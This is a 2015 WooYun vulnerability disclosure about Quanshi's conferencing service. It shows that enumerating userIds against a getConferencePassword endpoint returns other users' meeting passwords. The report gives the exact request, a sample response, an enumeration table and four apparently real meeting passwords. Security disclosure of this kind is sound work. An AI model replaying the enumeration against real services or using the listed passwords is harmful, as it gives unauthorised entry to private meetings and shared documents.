当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0135667

漏洞标题:全时敏感信息泄露#遍历会议密码

相关厂商:全时

漏洞作者: Ton7BrEak

提交时间:2015-08-20 18:17

修复时间:2015-10-05 11:00

公开时间:2015-10-05 11:00

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:12

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-20: 细节已通知厂商并且等待厂商处理中
2015-08-21: 厂商已经确认,细节仅向厂商公开
2015-08-31: 细节向核心白帽子及相关领域专家公开
2015-09-10: 细节向普通白帽子公开
2015-09-20: 细节向实习白帽子公开
2015-10-05: 细节向公众公开

简要描述:

全时敏感信息泄露#遍历会议密码
可以直接进入他人会议

详细说明:

接口信息,post请求

https://uniform.quanshi.com/rest/account/mobile/getConferencePassword


请求参数

{
"userId":"1785655"
}


遍历userid,部分用户返回报错。这里只看返回值正确, status = 0的用户。某个用户的返回值为

{"status":0,"result":{"id":"201913","billingCode":"61053760","productType":"0","pcode1":"833458466153853602","pcode2":"967178639336346660","identity":"1","userStatus":"82"},"content_type":"application\/json"}


这里进入他人的密码为pcode2 967178639336346660
OK 遍历600个用户(自身用户为试用账号,自身id-600)根据返回长度判断是否返回正常

481	1785535	200	false	false	764	
295 1785349 200 false false 764
293 1785347 200 false false 764
287 1785341 200 false false 764
279 1785333 200 false false 764
313 1785367 200 false false 760
309 1785363 200 false false 760
303 1785357 200 false false 760
283 1785337 200 false false 760
391 1785445 200 false false 756
583 1785637 200 false false 752
459 1785513 200 false false 752
453 1785507 200 false false 752
393 1785447 200 false false 752
267 1785321 200 false false 752
527 1785581 200 false false 748
517 1785571 200 false false 748
501 1785555 200 false false 748
473 1785527 200 false false 748
471 1785525 200 false false 748
469 1785523 200 false false 748
465 1785519 200 false false 748
427 1785481 200 false false 748
401 1785455 200 false false 748
397 1785451 200 false false 748
395 1785449 200 false false 748
389 1785443 200 false false 748
387 1785441 200 false false 748
385 1785439 200 false false 748
383 1785437 200 false false 748
381 1785435 200 false false 748
377 1785431 200 false false 748
375 1785429 200 false false 748
373 1785427 200 false false 748
369 1785423 200 false false 748
367 1785421 200 false false 748
363 1785417 200 false false 748
361 1785415 200 false false 748
337 1785391 200 false false 748
509 1785563 200 false false 747
299 1785353 200 false false 747
271 1785325 200 false false 747
523 1785577 200 false false 744
491 1785545 200 false false 744
477 1785531 200 false false 744
475 1785529 200 false false 744
461 1785515 200 false false 744
455 1785509 200 false false 744
449 1785503 200 false false 744
445 1785499 200 false false 744
443 1785497 200 false false 744
425 1785479 200 false false 744
399 1785453 200 false false 744
371 1785425 200 false false 744
365 1785419 200 false false 744
359 1785413 200 false false 744
285 1785339 200 false false 744
281 1785335 200 false false 744
273 1785327 200 false false 744
413 1785467 200 false false 743
11 1785065 200 false false 743
489 1785543 200 false false 740
431 1785485 200 false false 740
379 1785433 200 false false 740


截图看看

001.jpg


002.jpg


漏洞证明:

下载PC端

http://dlgray.quanshi.com/demo/faq/download/G-Net_MeetNow_Setup.exe


尝试用其他的会议密码去登录

000.jpg


001.jpg


003.jpg


004.jpg


005.jpg


危害说明:
1、随意进入他人会议,那么可以旁观窃取信息、诈骗等等
2、共享文档,造成的文档泄露
3、其他
提供部分会议密码供测试,审核后建议打码

7103412686
9037511573
8175366723
1198143305

修复方案:

版权声明:转载请注明来源 Ton7BrEak@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-08-21 10:59

厂商回复:

感谢反馈,我们立即处理。

最新状态:

暂无


漏洞评价:

评论

  1. 2015-08-20 22:22 | px1624 ( 普通白帽子 | Rank:1038 漏洞数:176 | px1624)

    中:5rank感谢您的检测,我们会立刻修改。另外,烦请帮我们的带有全时标志的信息涂擦掉,谢谢!

  2. 2015-08-21 21:13 | 番茄师傅 ( 普通白帽子 | Rank:281 漏洞数:79 | http://www.tomatoyu.com/)

    中:5rank 感谢您的检测,我们会立刻修改。另外,烦请帮我们的带有全时标志的信息涂擦掉,谢谢!